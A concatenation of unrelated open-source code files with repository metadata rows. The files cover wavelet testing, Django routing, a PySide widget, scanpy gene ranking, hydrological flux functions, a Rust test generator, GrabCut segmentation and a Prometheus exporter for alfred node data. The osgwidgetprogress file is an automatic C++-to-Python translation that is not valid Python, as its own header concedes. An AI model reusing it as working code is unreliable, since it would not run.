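# approximation (LL) top-left, diagonal detail (HH) bottom-right, and the
# sign-flipped detail bands (HL, LH) in the remaining two quadrants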
img[:N//2, :N//2] = LL[2: -2, 2: -2]
img[N//2:N, N//2:N] = HH[2: -2, 2: -2]
img[:N//2, N//2:N] = -HL[2: -2, 2: -2]
img[N//2:N, :N//2] = -LH[2: -2, 2: -2]
N //= 2
return img
if __name__ == '__main__':
import cv2
import pywt
import matplotlib.pyplot as plt
img = cv2.imread('Cameraman256.png', cv2.IMREAD_GRAYSCALE)
img = img.astype(np.float64)
# img = img[0:8, 0:8]
# original way
original_bior_img = original_bior_2d_forward(img)
# my way
bior_img = bior_2d_forward(img.copy())
# a, b = 0, 8
# c, d = 0, 8
# print('original_bior_img\n', original_bior_img[a:b, c:d].astype(np.int))
# print('bior_img\n', bior_img[a:b, c:d].astype(np.int))
# print('max original_bior_img', np.max(original_bior_img))
# print('min original_bior_img', np.min(original_bior_img))
#
# print('max bior_img', np.max(bior_img))
# print('min bior_img', np.min(bior_img))
diff = original_bior_img - bior_img
print('sum of diff', np.sum(np.abs(diff)))
print('max of diff', np.max(np.abs(diff)))
cv2.imshow('original_bior_img', original_bior_img)
cv2.imshow('bior_img', bior_img)
cv2.imshow('diff', diff)
cv2.waitKey()
| 29.454545 | 83 | 0.606173 | [
"MIT"
] | oleges1/denoising_project | BM3D_py/cpp2py_test/bior_2d_forward_test2.py | 1,620 | Python |
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('blog/', include('blog.urls'))
]
| 34.652174 | 77 | 0.702635 | [
"MIT"
] | vadonmo/django | mysite/mysite/urls.py | 797 | Python |
# ReID Online Upload Service | 28 | 28 | 0.821429 | [
"MIT"
] | MikeCun/PersonReID | upload/__init__.py | 28 | Python |
from PySide import QtGui, QtCore
from AttributeWidgetImpl import AttributeWidget
class ScalarWidget(AttributeWidget):
def __init__(self, attribute, parentWidget=None, addNotificationListener = True):
super(ScalarWidget, self).__init__(attribute, parentWidget=parentWidget, addNotificationListener = addNotificationListener)
hbox = QtGui.QHBoxLayout()
self._widget = QtGui.QLineEdit(self)
validator = QtGui.QDoubleValidator(self)
validator.setDecimals(3)
self._widget.setValidator(validator)
hbox.addWidget(self._widget, 1)
hbox.addStretch(0)
hbox.setContentsMargins(0, 0, 0, 0)
self.setLayout(hbox)
self.setSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
self.updateWidgetValue()
if self.isEditable():
self._widget.editingFinished.connect(self._invokeSetter)
else:
self._widget.setReadOnly(True)
def getWidgetValue(self):
return float(self._widget.text())
def setWidgetValue(self, value):
self._widget.setText(str(round(value, 4)))
@classmethod
def canDisplay(cls, attribute):
return(
attribute.getDataType() == 'Scalar' or
attribute.getDataType() == 'Float32' or
attribute.getDataType() == 'Float64'
)
ScalarWidget.registerPortWidget()
| 31.244444 | 131 | 0.667141 | [
"BSD-3-Clause"
] | FabricExile/Kraken | Python/kraken/ui/DataTypeWidgets/ScalarWidgetImpl.py | 1,406 | Python |
# Author: F. Alex Wolf (http://falexwolf.de)
"""Differential Gene Expression Analysis
This is a Beta Version of a tool for differential gene expression testing
between sets detected in previous tools. Tools such as dpt, cluster,...
"""
import numpy as np
from scipy.sparse import issparse
from .. import utils
from .. import logging as logg
from ..preprocessing import simple
def rank_genes_groups(
adata,
groupby,
groups='all',
group_reference=None,
n_genes=100,
compute_distribution=False,
only_positive=True,
copy=False):
"""Rank genes according to differential expression [Wolf17]_.
Rank genes by differential expression. By default, a t-test-like ranking is
used, in which means are normalized with variances. Soon, a Wilcoxon-rank
test and other alternatives will be provided.
Parameters
----------
adata : `AnnData`
Annotated data matrix.
groupby : `str`
The key of the sample grouping to consider.
groups : `str`, `list`, optional (default: `'all'`)
Subset of groups, e.g. `['g1', 'g2', 'g3']`, to which comparison shall
be restricted. If not passed, a ranking will be generated for all
groups.
group_reference : `str` or `None`, optional (default: `None`)
If `None`, compare each group to the union of the rest of the group. If
a group identifier, the comparison will be with respect to this group.
n_genes : `int` (default: 100)
How many genes to rank by default.
compute_distribution : `bool`
If `True`, also computes the distribution for top-ranked genes, which
can be visualized using `sc.pl.rank_genes_groups_violin(adata)`.
Returns
-------
rank_genes_groups_gene_zscores : np.ndarray of dtype float (adata.add)
Array of shape (number of comparisons) × (number of genes) storing the
zscore of each gene for each test.
rank_genes_groups_gene_names : np.ndarray of dtype str (adata.add)
Array of shape (number of comparisons). Stores the labels for each comparison,
for example "C1 vs. C2" when comparing category 'C1' with 'C2'.
"""
logg.info('find differentially expressed genes', r=True)
adata = adata.copy() if copy else adata
n_genes_user = n_genes
utils.check_adata(adata)
# for clarity, rename variable
groups_order = groups
if isinstance(groups_order, list) and isinstance(groups_order[0], int):
groups_order = [str(n) for n in groups_order]
if group_reference is not None and group_reference not in set(groups_order):
groups_order += [group_reference]
if (group_reference is not None
and group_reference not in set(adata.add[groupby + '_order'])):
raise ValueError('group_reference = {} needs to be one of groupby = {}.'
.format(group_reference, groupby))
groups_order, groups_masks = utils.select_groups(
adata, groups_order, groupby)
adata.add['rank_genes_groups'] = groupby
adata.add['rank_genes_groups_order'] = groups_order
X = adata.X
# loop over all masks and compute means, variances and sample numbers
n_groups = groups_masks.shape[0]
n_genes = X.shape[1]
means = np.zeros((n_groups, n_genes))
vars = np.zeros((n_groups, n_genes))
ns = np.zeros(n_groups, dtype=int)
for imask, mask in enumerate(groups_masks):
means[imask], vars[imask] = simple._get_mean_var(X[mask])
ns[imask] = np.where(mask)[0].size
logg.info('... consider "{}":'.format(groupby), groups_order,
'with sample numbers', ns)
if group_reference is not None:
ireference = np.where(groups_order == group_reference)[0][0]
# test each either against the union of all other groups
# or against a specific group
rankings_gene_zscores = []
rankings_gene_names = []
reference_indices = np.arange(adata.n_vars, dtype=int)
for igroup in range(n_groups):
if group_reference is None:
mask_rest = ~groups_masks[igroup]
else:
if igroup == ireference: continue
else: mask_rest = groups_masks[ireference]
mean_rest, var_rest = simple._get_mean_var(X[mask_rest])
# Make a more conservative assumption on the variance reduction
# in the reference. Instead of this
ns_rest = np.where(mask_rest)[0].size
# use this
# ns_rest = ns[igroup]
denominator = np.sqrt(vars[igroup]/ns[igroup] + var_rest/ns_rest)
denominator[np.flatnonzero(denominator == 0)] = np.nan
zscores = (means[igroup] - mean_rest) / denominator
zscores[np.isnan(zscores)] = 0
zscores = zscores if only_positive else np.abs(zscores)
partition = np.argpartition(zscores, -n_genes_user)[-n_genes_user:]
partial_indices = np.argsort(zscores[partition])[::-1]
global_indices = reference_indices[partition][partial_indices]
rankings_gene_zscores.append(zscores[global_indices])
rankings_gene_names.append(adata.var_names[global_indices])
if compute_distribution:
mask = groups_masks[igroup]
for gene_counter in range(n_genes_user):
gene_idx = global_indices[gene_counter]
X_col = X[mask, gene_idx]
if issparse(X): X_col = X_col.toarray()[:, 0]
identifier = _build_identifier(groupby, groups_order[igroup],
gene_counter, adata.var_names[gene_idx])
full_col = np.empty(adata.n_smps)
full_col[:] = np.nan
full_col[mask] = (X_col - mean_rest[gene_idx])/denominator[gene_idx]
adata.smp[identifier] = full_col
groups_order_save = groups_order
if group_reference is not None:
groups_order_save = [g for g in groups_order if g != group_reference]
adata.add['rank_genes_groups_gene_scores'] = np.rec.fromarrays(
[n for n in rankings_gene_zscores],
dtype=[(rn, 'float32') for rn in groups_order_save])
adata.add['rank_genes_groups_gene_names'] = np.rec.fromarrays(
[n for n in rankings_gene_names],
dtype=[(rn, 'U50') for rn in groups_order_save])
logg.m(' finished', t=True, end=' ')
logg.m('and added\n'
' "rank_genes_groups_gene_names", np.recarray to be indexed by the `groups` (adata.add)\n'
' "rank_genes_groups_gene_zscores", the scores (adata.add)\n'
' "rank_genes_...", distributions of top-ranked genes (adata.smp)')
return adata if copy else None
def _build_identifier(groupby, name, gene_counter, gene_name):
return 'rank_genes_{}_{}_{}_{}'.format(
groupby, name, gene_counter, gene_name)
| 44.679739 | 104 | 0.655061 | [
"BSD-3-Clause"
] | gioelelm/scanpy | scanpy/tools/rank_genes_groups.py | 6,837 | Python |
from __future__ import absolute_import
from django.dispatch import Signal
from functools import wraps
class BetterSignal(Signal):
def connect(self, receiver=None, **kwargs):
"""
Support decorator syntax:
>>> @signal.connect(sender=type)
>>> def my_receiver(**kwargs):
>>> pass
"""
def wrapped(func):
return super(BetterSignal, self).connect(func, **kwargs)
if receiver is None:
return wrapped
return wraps(receiver)(wrapped(receiver))
regression_signal = BetterSignal(providing_args=["instance"])
buffer_incr_complete = BetterSignal(providing_args=["model", "columns", "extra", "result"])
event_received = BetterSignal(providing_args=["ip"])
| 26.928571 | 91 | 0.657825 | [
"BSD-3-Clause"
] | ChadKillingsworth/sentry | src/sentry/signals.py | 754 | Python |
# Purpose: Calculate hydrological fluxes in the canopy, unsaturated and saturated sub-domains
# Record of revisions:
# Date Programmer Description of change
# ======== ============= =====================
# 09-2020 A. Elkouk Original code
# ----------------------------------------------------------------------------------------------------------------------
# Parametrization for the fluxes in the vegetation canopy
# ----------------------------------------------------------------------------------------------------------------------
def calc_wetted_fraction(canopyStore, canopyStore_max, gamma):
""" Calculate the wetted fraction of the canopy
Parameters
----------
canopyStore : int or float
Canopy Interception storage [mm]
canopyStore_max : int or float
Maximum non-drainable canopy interception storage [mm]
gamma : float
Parameter to account for the non-linearity in the wetted fraction of the canopy
Returns
-------
wetFrac: float
Wetted fraction of the canopy
"""
if canopyStore < canopyStore_max:
wetFrac = (canopyStore / canopyStore_max) ** gamma
else:
wetFrac = 1.0
return wetFrac
def calc_canopy_evaporation(pet, wetFrac):
""" Calculate the evaporation from canopy interception storage
Parameters
----------
pet : int or float
Potential evapotranspiration [mm day^-1]
wetFrac : float
Wetted fraction of the canopy
Returns
-------
canopyEvap: float
Evaporation from canopy interception storage [mm day^-1]
"""
canopyEvap = pet * wetFrac
return canopyEvap
def calc_throughfall_flux(precip, canopyStore, canopyStore_max):
""" Calculate the throughfall flux from canopy interception storage
Parameters
----------
precip : int or float
Precipitation flux [mm day^-1]
canopyStore : int or float
Canopy Interception storage [mm]
canopyStore_max : int or float
Maximum non-drainable canopy interception storage [mm]
Returns
-------
throughfall : int or float
Throughfall flux [mm day^-1]
"""
if canopyStore < canopyStore_max:
throughfall = precip * (canopyStore / canopyStore_max)
else:
throughfall = precip
return throughfall
def calc_canopy_drainage_flux(canopyStore, canopyStore_max, k_can):
""" Calculate the canopy drainage flux from canopy interception storage
Parameters
----------
canopyStore : int or float
Canopy Interception storage [mm]
canopyStore_max : int or float
Maximum non-drainable canopy interception storage [mm]
k_can: float
Canopy drainage coefficient [day^-1]
Returns
-------
canopyDrain : int or float
Canopy drainage flux [mm day^-1]
"""
if canopyStore < canopyStore_max:
canopyDrain = 0.0
else:
canopyDrain = k_can * (canopyStore - canopyStore_max)
return canopyDrain
def calc_precipitation_excess(throughfall, canopyDrain):
""" Calculate excess precipitation (the sum of throughfall and canopy drainage)
Parameters
----------
throughfall : int or float
Throughfall flux [mm day^-1]
canopyDrain : int or float
Canopy drainage flux [mm day^-1]
Returns
-------
precipExcess : int or float
Excess precipitation [mm day^-1]
"""
precipExcess = throughfall + canopyDrain
return precipExcess
# ----------------------------------------------------------------------------------------------------------------------
# Parametrization for the fluxes in the unsaturated zone
# ----------------------------------------------------------------------------------------------------------------------
def calc_saturated_fraction(unsatStore, unsatStore_max, alpha):
""" Calculate the saturated fraction of the unsaturated zone
Parameters
----------
unsatStore : int or float
Storage in the unsaturated zone [mm]
unsatStore_max : int or float
Maximum storage in the unsaturated zone [mm]
alpha : float
Parameter to account for the non-linearity in the variable source area for saturation-excess runoff
Returns
-------
satFrac: float
Saturated fraction of the unsaturated zone
"""
if unsatStore < unsatStore_max:
satFrac = 1 - (1 - (unsatStore / unsatStore_max)) ** alpha
else:
satFrac = 1
return satFrac
def calc_unsaturated_evaporation(pet, unsatStore, fieldCap, wetFrac):
""" Calculate evaporation from the unsaturated zone
Parameters
----------
pet : int or float
Potential evapotranspiration [mm day^-1]
unsatStore : int or float
Storage in the unsaturated zone [mm]
fieldCap : int or float
Field capacity [mm]
wetFrac : float
Wetted fraction of the canopy
Returns
-------
unsatEvap : float
Evaporation from the unsaturated zone [mm day^-1]
"""
if unsatStore < fieldCap:
unsatEvap = pet * (unsatStore / fieldCap) * (1 - wetFrac)
else:
unsatEvap = pet * (1 - wetFrac)
return unsatEvap
def calc_overland_flow(precipExcess, satFrac):
""" Calculate overland flow (surface runoff)
Parameters
----------
precipExcess : int or float
Excess precipitation [mm day^-1]
satFrac : float
Saturated fraction of the unsaturated zone
Returns
-------
overlandFlow : float
Overland flow (surface runoff) [mm day^-1]
"""
overlandFlow = precipExcess * satFrac
return overlandFlow
def calc_percolation_flux(unsatStore, unsatStore_max, fieldCap, k_sat, beta):
""" Calculate the percolation flux from the unsaturated to the saturated zone
Parameters
----------
unsatStore : int or float
Storage in the unsaturated zone [mm]
unsatStore_max : int or float
Maximum storage in the unsaturated zone [mm]
fieldCap : int or float
Field capacity [mm]
k_sat : int or float
Maximum percolation rate [mm day^-1]
beta : int or float
Parameter to account for percolation non-linearity
Returns
-------
percolation : int or float
Percolation flux [mm day^-1]
"""
if unsatStore < fieldCap:
percolation = 0.0
else:
percolation = k_sat * ((unsatStore - fieldCap) / (unsatStore_max - fieldCap)) ** beta
return percolation
# ----------------------------------------------------------------------------------------------------------------------
# Parametrization for the fluxes in the saturated zone
# ----------------------------------------------------------------------------------------------------------------------
def calc_baseflow(satStore, k_sz):
""" Calculate baseflow from the saturated zone
Parameters
----------
satStore : int or float
Storage in the saturated zone [mm]
k_sz : float
Runoff coefficient for the saturated zone [day^-1]
Returns
-------
baseflow : float
Baseflow from the saturated zone [mm day^-1]
"""
baseflow = satStore * k_sz
return baseflow
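# Minimal usage sketch (illustrative, uncalibrated parameter values): chain the
# canopy, unsaturated-zone and saturated-zone fluxes for a single day of forcing.
if __name__ == '__main__':
    precip, pet = 20.0, 4.0                                    # forcing [mm day^-1]
    canopyStore, canopyStore_max = 1.5, 2.0                    # canopy storage [mm]
    unsatStore, unsatStore_max, fieldCap = 80.0, 150.0, 60.0   # soil storage [mm]
    satStore = 40.0                                            # saturated-zone storage [mm]
    wetFrac = calc_wetted_fraction(canopyStore, canopyStore_max, gamma=0.8)
    canopyEvap = calc_canopy_evaporation(pet, wetFrac)
    throughfall = calc_throughfall_flux(precip, canopyStore, canopyStore_max)
    canopyDrain = calc_canopy_drainage_flux(canopyStore, canopyStore_max, k_can=0.5)
    precipExcess = calc_precipitation_excess(throughfall, canopyDrain)
    satFrac = calc_saturated_fraction(unsatStore, unsatStore_max, alpha=2.0)
    unsatEvap = calc_unsaturated_evaporation(pet, unsatStore, fieldCap, wetFrac)
    overlandFlow = calc_overland_flow(precipExcess, satFrac)
    percolation = calc_percolation_flux(unsatStore, unsatStore_max, fieldCap, k_sat=100.0, beta=2.0)
    baseflow = calc_baseflow(satStore, k_sz=0.05)
    print('canopy evaporation [mm/day]:', canopyEvap)
    print('unsaturated-zone evaporation [mm/day]:', unsatEvap)
    print('overland flow [mm/day]:', overlandFlow)
    print('percolation [mm/day]:', percolation)
    print('baseflow [mm/day]:', baseflow)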
| 28.520913 | 121 | 0.557792 | [
"MIT"
] | aelkouk/rainfall_runoff | flux_param.py | 7,501 | Python |
from django import forms
class SubmitEmbed(forms.Form):
url = forms.URLField() | 20.75 | 30 | 0.746988 | [
"MIT"
] | Tag-Strategies/Tag_Strategies | backend/fec/forms.py | 83 | Python |
########################################################################
#
# Constants
#
########################################################################
RETURN_SUCCESS = 1234 # Requested command executed successfully
RETURN_FAIL = None # Requested command failed | 34.625 | 72 | 0.361011 | [
"BSD-3-Clause"
] | dibondar/PyPhotonicReagents | libs/dev/consts.py | 277 | Python |
#!/usr/bin/env python
#
# Copyright 2013 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
"""
This script creates a pile of compile-fail tests check that all the
derives have spans that point to the fields, rather than the
#[derive(...)] line.
sample usage: src/etc/generate-deriving-span-tests.py
"""
import sys, os, datetime, stat
TEST_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../test/compile-fail'))
YEAR = datetime.datetime.now().year
TEMPLATE = """// Copyright {year} The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// This file was auto-generated using 'src/etc/generate-deriving-span-tests.py'
extern crate rand;
{error_deriving}
struct Error;
{code}
fn main() {{}}
"""
ENUM_STRING = """
#[derive({traits})]
enum Enum {{
A(
Error {errors}
)
}}
"""
ENUM_STRUCT_VARIANT_STRING = """
#[derive({traits})]
enum Enum {{
A {{
x: Error {errors}
}}
}}
"""
STRUCT_STRING = """
#[derive({traits})]
struct Struct {{
x: Error {errors}
}}
"""
STRUCT_TUPLE_STRING = """
#[derive({traits})]
struct Struct(
Error {errors}
);
"""
ENUM_TUPLE, ENUM_STRUCT, STRUCT_FIELDS, STRUCT_TUPLE = range(4)
def create_test_case(type, trait, super_traits, number_of_errors):
string = [ENUM_STRING, ENUM_STRUCT_VARIANT_STRING, STRUCT_STRING, STRUCT_TUPLE_STRING][type]
all_traits = ','.join([trait] + super_traits)
super_traits = ','.join(super_traits)
error_deriving = '#[derive(%s)]' % super_traits if super_traits else ''
errors = '\n'.join('//~%s ERROR' % ('^' * n) for n in range(number_of_errors))
code = string.format(traits = all_traits, errors = errors)
return TEMPLATE.format(year = YEAR, error_deriving=error_deriving, code = code)
def write_file(name, string):
test_file = os.path.join(TEST_DIR, 'derives-span-%s.rs' % name)
# set write permission if file exists, so it can be changed
if os.path.exists(test_file):
os.chmod(test_file, stat.S_IWUSR)
with open(test_file, 'wt') as f:
f.write(string)
# mark file read-only
os.chmod(test_file, stat.S_IRUSR|stat.S_IRGRP|stat.S_IROTH)
ENUM = 1
STRUCT = 2
ALL = STRUCT | ENUM
traits = {
'Zero': (STRUCT, [], 1),
'Default': (STRUCT, [], 1),
'FromPrimitive': (0, [], 0), # only works for C-like enums
'Decodable': (0, [], 0), # FIXME: quoting gives horrible spans
'Encodable': (0, [], 0), # FIXME: quoting gives horrible spans
}
for (trait, supers, errs) in [('Clone', [], 1),
('PartialEq', [], 2),
('PartialOrd', ['PartialEq'], 8),
('Eq', ['PartialEq'], 1),
('Ord', ['Eq', 'PartialOrd', 'PartialEq'], 1),
('Debug', [], 1),
('Hash', [], 1)]:
traits[trait] = (ALL, supers, errs)
for (trait, (types, super_traits, error_count)) in traits.items():
mk = lambda ty: create_test_case(ty, trait, super_traits, error_count)
if types & ENUM:
write_file(trait + '-enum', mk(ENUM_TUPLE))
write_file(trait + '-enum-struct-variant', mk(ENUM_STRUCT))
if types & STRUCT:
write_file(trait + '-struct', mk(STRUCT_FIELDS))
write_file(trait + '-tuple-struct', mk(STRUCT_TUPLE))
| 30.38806 | 96 | 0.639244 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | AaronFriel/rust | src/etc/generate-deriving-span-tests.py | 4,072 | Python |
#!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgwidgetprogress"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osgDB
from osgpypp import osgWidget
# Translated from file 'osgwidgetprogress.cpp'
# -*-c++-*- osgWidget - Code by: Jeremy Moles (cubicool) 2007-2008
# $Id$
#include <osgDB/ReadFile>
#include <osgWidget/Util>
#include <osgWidget/WindowManager>
#include <osgWidget/Canvas>
MASK_2D = 0xF0000000
class UpdateProgressNode (osg.NodeCallback) :
start = float()
done = float()
UpdateProgressNode():
start (0.0),
done (5.0)
virtual void operator()(osg.Node* node, osg.NodeVisitor* nv)
fs = nv.getFrameStamp()
t = fs.getSimulationTime()
if start == 0.0 : start = t
width = ((t - start) / done) * 512.0
percent = (width / 512.0) * 100.0
if width < 1.0 or width > 512.0 : return
window = dynamic_cast<osgWidget.Window*>(node)
if not window : return
w = window.getByName("pMeter")
l = dynamic_cast<osgWidget.Label*>(window.getByName("pLabel"))
if not w or not l : return
w.setWidth(width)
w.setTexCoordRegion(0.0, 0.0, width, 64.0)
ss = std.ostringstream()
ss, osg.round(percent), "% Done"
l.setLabel(ss.str())
def main(argv):
viewer = osgViewer.Viewer()
wm = osgWidget.WindowManager(
viewer,
1280.0,
1024.0,
MASK_2D,
osgWidget.WindowManager.WM_PICK_DEBUG
)
canvas = osgWidget.Canvas("canvas")
pOutline = osgWidget.Widget("pOutline", 512.0, 64.0)
pMeter = osgWidget.Widget("pMeter", 0.0, 64.0)
pLabel = osgWidget.Label("pLabel", "0% Done")
pOutline.setImage("osgWidget/progress-outline.png", True)
pOutline.setLayer(osgWidget.Widget.LAYER_MIDDLE, 2)
pMeter.setImage("osgWidget/progress-meter.png")
pMeter.setColor(0.7, 0.1, 0.1, 0.7)
pMeter.setLayer(osgWidget.Widget.LAYER_MIDDLE, 1)
pLabel.setFont("fonts/VeraMono.ttf")
pLabel.setFontSize(20)
pLabel.setFontColor(1.0, 1.0, 1.0, 1.0)
pLabel.setSize(512.0, 64.0)
pLabel.setLayer(osgWidget.Widget.LAYER_MIDDLE, 3)
canvas.setOrigin(300.0, 300.0)
canvas.addWidget(pMeter, 0.0, 0.0)
canvas.addWidget(pOutline, 0.0, 0.0)
canvas.addWidget(pLabel, 0.0, 0.0)
canvas.getBackground().setColor(0.0, 0.0, 0.0, 0.0)
canvas.setUpdateCallback(UpdateProgressNode())
wm.addChild(canvas)
return osgWidget.createExample(viewer, wm, osgDB.readNodeFile("cow.osgt"))
if __name__ == "__main__":
main(sys.argv)
| 24.724771 | 78 | 0.643043 | [
"BSD-3-Clause"
] | JaneliaSciComp/osgpyplusplus | examples/rough_translated1/osgwidgetprogress.py | 2,695 | Python |
import numpy as np
import cv2
import matplotlib.pyplot as plt
#read image
img = np.array(cv2.imread('1.jpg'))
#mask that grabCut fills with per-pixel labels (same height/width as the image)
mask = np.zeros(img.shape[:2],np.uint8)
#temporary model arrays used internally by grabCut for the background/foreground models
bgdModel = np.zeros((1,65),np.float64)
fgdModel = np.zeros((1,65),np.float64)
#rectangle (x, y, width, height) inside which grabCut searches for the foreground
rect = (35,30,330,312)
#run OpenCV's grabCut algorithm to segment the foreground within the rectangle
cv2.grabCut(img,mask,rect,bgdModel,fgdModel,5,cv2.GC_INIT_WITH_RECT)
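# grabCut labels each pixel in `mask` as 0 (sure background), 1 (sure foreground),
# 2 (probable background) or 3 (probable foreground); keep only the foreground labels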
mask2 = np.where((mask==2)|(mask==0),0,1).astype('uint8')
img = img*mask2[:,:,np.newaxis]
#here we show our image
plt.imshow(img)
plt.colorbar()
plt.show()
cv2.imshow("sdfg",img)
cv2.waitKey(0)
cv2.imwrite("foreground.jpg",img)
| 26.9 | 88 | 0.708798 | [
"MIT"
] | ultimus11/Foreground-Detection-OpenCV | code/grab_foreground.py | 807 | Python |
#!/usr/bin/env python3
"""
Convert data received from alfred (ffbi format) and serve them as prometheus python client
Typical call::
alfred -r 69 -u /var/run/alfred/alfred.sock > robin.txt
./robin_prometheus.py -m robin.txt
Dependencies:
prometheus_client -> pip3 install prometheus_client
License: CC BY 4.0
Author: Jonas Hess
Strongly Inspired by map-backend of Moritz Warning and Julian Rueth
"""
import sys
import zlib
import re
import datetime
import os
import pickle
import time
import json
import jsonschema
from prometheus_client import start_http_server
from prometheus_client.core import GaugeMetricFamily, CounterMetricFamily, REGISTRY
if sys.version_info[0] < 3:
raise Exception("map-backend.py must be executed with Python 3.")
NOW_TIMESTAMP = datetime.datetime.utcnow().replace(microsecond=0)
class CustomCollector:
"""
    Custom Prometheus collector exposing the per-node metrics parsed from the alfred dump
"""
def collect(self):
"""
        Collect and yield the metric families for all known nodes; the Prometheus client calls this on every scrape
"""
downstream = GaugeMetricFamily('node_bw_wan_bps', 'last tested wan downstream mb/s', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'downstream_mbps_wan' in node:
downstream.add_metric([node['id']], node['downstream_mbps_wan'])
yield downstream
upstream = GaugeMetricFamily('node_bw_ff_bps', 'last tested ff downstream in mb/s', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'downstream_mbps_ff' in node:
upstream.add_metric([node['id']], node['downstream_mbps_ff'])
yield upstream
ping = GaugeMetricFamily('node_gw_ping_ms', 'last tested gateway ping in ms', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'gw_ping_ms' in node:
ping.add_metric([node['id']], node['gw_ping_ms'])
yield ping
# 'test_host': self.properties['test_host'],
# 'tested_when': self.properties['tested_when'],
rx_counter = CounterMetricFamily('node_rx_bytes', 'received bytes', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'rx_bytes' in node:
rx_counter.add_metric([node['id']], int(node['rx_bytes']))
yield rx_counter
tx_counter = CounterMetricFamily('node_tx_bytes', 'transmitted bytes', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'tx_bytes' in node:
tx_counter.add_metric([node['id']], int(node['tx_bytes']))
yield tx_counter
class AlfredParser:
"""
A class providing static methods to parse and validate data reported by
nodes via alfred.
"""
MAC_RE = "^([0-9a-f]{2}:){5}[0-9a-f]{2}$"
MAC_SCHEMA = {"type": "string", "pattern": MAC_RE}
ALFRED_NODE_SCHEMA = {
"type": "object",
"additionalProperties": True,
"properties": {
'downstream_mbps_wan': {"type": "number"},
'downstream_mbps_ff': {"type": "number"},
'gw_ping_ms': {"type": "number"},
'tested_when': {"type": "string", "maxLength": 50},
'rx_bytes': {"type": "number"},
'tx_bytes': {"type": "number"},
},
"definitions": {
"MAC": MAC_SCHEMA,
}
}
@staticmethod
def _parse_string(parse_it):
"""
Strip an escaped string which is enclosed in double quotes and
unescape.
"""
if parse_it[0] != '"' or parse_it[-1] != '"':
raise ValueError("malformatted string: {0:r}".format(parse_it))
return bytes(parse_it[1:-1], 'ascii').decode('unicode-escape')
@staticmethod
def parse_line(item, nodes=None):
"""
Parse and validate a line as returned by alfred.
        Such lines consist of a node's MAC address and an escaped string of JSON
encoded data. Note that most missing fields are populated with
reasonable defaults.
"""
# parse the strange output produced by alfred { MAC, JSON },
if nodes is None:
nodes = {}
if item[-2:] != "}," or item[0] != "{":
raise ValueError("malformatted line: {0}".format(item))
mac, properties = item[1:-2].split(',', 1)
# the first part must be a valid MAC
mac = AlfredParser._parse_string(mac.strip())
jsonschema.validate(mac, AlfredParser.MAC_SCHEMA)
# the second part must conform to ALFRED_NODE_SCHEMA
properties = AlfredParser._parse_string(properties.strip())
if "\x00" in properties:
decompress = zlib.decompressobj(zlib.MAX_WBITS | 32)
# ignores any output beyond 64k (protection from zip bombs)
properties = decompress.decompress(properties.encode('raw-unicode-escape'), 64 * 1024).decode('utf-8')
else:
properties = properties.encode('latin-1').decode('utf8')
properties = json.loads(properties)
jsonschema.validate(properties, AlfredParser.ALFRED_NODE_SCHEMA)
# set some defaults for unspecified fields
properties.setdefault('downstream_mbps_wan', 0)
properties.setdefault('downstream_mbps_ff', 0)
properties.setdefault('rx_bytes', 0)
properties.setdefault('tx_bytes', 0)
if mac in nodes:
# update existing node
node = nodes[mac]
node.update_properties(properties, True)
node.online = True
node.lastseen = NOW_TIMESTAMP
else:
# create a new Node
node = Node(mac, properties, True)
nodes[mac] = node
class Node:
"""
A node in the freifunk network, identified by its primary MAC.
"""
def __init__(self, mac, properties, online):
self.mac = mac
self.properties = properties
if online:
self.lastseen = NOW_TIMESTAMP
self.firstseen = NOW_TIMESTAMP
else:
self.lastseen = None
self.firstseen = None
self.online = online
self.index = None # the index of this node in the list produced for ffmap
self.done = False
def update_properties(self, properties, force=True):
"""
Replace any properties with their respective values in ``properties``.
"""
if force:
# discard all previous properties
self.properties = dict(properties)
if 'force' in self.properties:
del self.properties['force']
else:
# add new key/value pairs only if not already set
for key, value in properties.items():
if key not in self.properties:
if key == "force":
continue
if key == "name":
value = value + "*"
self.properties[key] = value
def nodelist(self):
"""
        Return this node's node-list entry with its id, status and last test results
"""
if 'downstream_mbps_wan' not in self.properties:
self.properties['downstream_mbps_wan'] = 0
if 'downstream_mbps_ff' not in self.properties:
self.properties['downstream_mbps_ff'] = 0
obj = {
'id': re.sub('[:]', '', self.mac),
'status': {
'online': self.online,
},
'downstream_mbps_wan': self.properties['downstream_mbps_wan'],
'downstream_mbps_ff': self.properties['downstream_mbps_ff'],
'tested_when': self.properties['tested_when'],
'rx_bytes': self.properties['rx_bytes'],
'tx_bytes': self.properties['tx_bytes'],
}
if 'gw_ping_ms' in self.properties:
obj['gw_ping_ms'] = self.properties['gw_ping_ms']
if self.firstseen:
obj['firstseen'] = self.firstseen.isoformat()
if self.lastseen:
obj['status']['lastcontact'] = self.lastseen.isoformat()
return obj
def render_nodelist(nodes):
"""
